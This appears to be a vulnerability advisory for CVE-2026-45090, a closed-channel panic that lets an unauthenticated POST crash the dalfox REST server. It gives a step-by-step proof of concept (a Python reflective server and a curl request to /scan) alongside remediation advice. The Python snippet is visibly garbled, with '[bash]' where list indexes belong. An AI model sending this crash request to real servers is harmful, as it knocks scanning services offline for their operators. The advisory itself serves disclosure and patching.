Listen to this Post
How CVE-2026-45090 Works
ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage — which processes POST-body parameters (dp) — is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process.
In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != “” (i.e., the attacker supplies the data field) and the target reflects at least one parameter.
Attack Vector: Network — server binds to 0.0.0.0:6664 by default; reachable by any network peer. Attack Complexity: Low — the attacker controls both trigger conditions: the data field that populates the second stage’s work queue, and the target URL they point at a reflective server they control. Privileges Required: None — –api-key defaults to “”, so no auth middleware is registered. User Interaction: None. Scope: Unchanged — a goroutine panic without a recover terminates the entire Go process; the impact stays within the dalfox process authority. Confidentiality Impact: None. Integrity Impact: None. Availability Impact: High — the entire dalfox server process crashes, requiring manual restart. A single well-timed request is sufficient.
Note on PR 917: Commit 8a424d1 (fix: resolve data race and nil pointer panic in processParams) fixed two concurrent-safety bugs in processParams — a data race on paramResult.Chars and a nil pointer dereference on resp.Header. It did not fix the closed-channel panic reported here, which is a structural ordering bug in ParameterAnalysis itself, not inside processParams.
Affected Component: pkg/scanning/parameterAnalysis.go — ParameterAnalysis() (lines 436–448): results channel closed at line 438, then passed to second-stage processParams workers at line 445; pkg/scanning/parameterAnalysis.go — processParams() (line 299): results <- paramResult panics when results is closed.
CWE: CWE-362: Concurrent Execution Using Shared Resource with Improper Synchronization (‘Race Condition’) — channel lifecycle ordering error; CWE-404: Improper Resource Shutdown or Release.
DailyCVE Form
Platform: Dalfox (REST API)
Version: <=2.12.0
Vulnerability: Channel panic DOS
Severity: High 7.5
Date: 2026-05-12
Prediction: Patch 2026-05-19
What Undercode Say:
Analytics:
- Exploitability: Very High — unauthenticated network triggered
- CVSS 3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
- Attack Surface: Exposed REST API (default port 6664)
- Trigger Conditions: data field + reflective target
- Remediation Complexity: Low — allocate fresh channel
Bash Commands / Code (Proof of Concept):
Step 1 — Attacker-controlled reflective server
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def _h(self):
qs = parse_qs(urlparse(self.path).query)
n = int(self.headers.get('Content-Length', '0'))
body = self.rfile.read(n).decode() if n else ''
bq = parse_qs(body)
v = qs.get('q', [''])[bash] or bq.get('q', [''])[bash]
out = f'<html><body>{v}</body></html>'.encode()
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(out)))
self.end_headers()
self.wfile.write(out)
def do_GET(self): self._h()
def do_POST(self): self._h()
def log_message(self, a): pass
HTTPServer(('127.0.0.1', 18083), H).serve_forever()
PY
Step 2 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest
Step 3 — Single unauthenticated request terminates the server process
curl -s -X POST http://127.0.0.1:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://127.0.0.1:18083/?q=test",
"options": {
"data": "q=test",
"mining-dict": true,
"use-headless": false,
"worker": 1
}
}'
Expected: dalfox process exits with: panic: send on closed channel
Step 4 — Verify server is down
curl -s http://127.0.0.1:16664/health
Expected: connection refused
Exploit:
Attacker sends a single HTTP POST request to /scan endpoint with “data” field and “mining-dict”: true, pointing the “url” to a reflective server. The second stage workers receive a closed channel, and upon first reflected parameter they execute `results <- paramResult` causing Go runtime panic → entire dalfox server crashes.
Protection from this CVE
- Upgrade to patched version (>2.12.0) once available (see predicted date above).
- Apply recommended remediation: allocate fresh results channel for second stage.
- Workaround: enable API key (
--api-key) to block unauthenticated requests. - Network-level restriction: block access to port 6664 from untrusted sources.
- Monitor for crash loops and implement automatic restart with rate limiting.
Impact
- Complete server process crash via single unauthenticated POST request.
- All in-flight scans lost without results.
- Manual restart required; under process managers (systemd, Docker) repeated triggering creates DoS loop.
- Attack requires only network access to port 6664 and a controllable reflective HTTP server.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

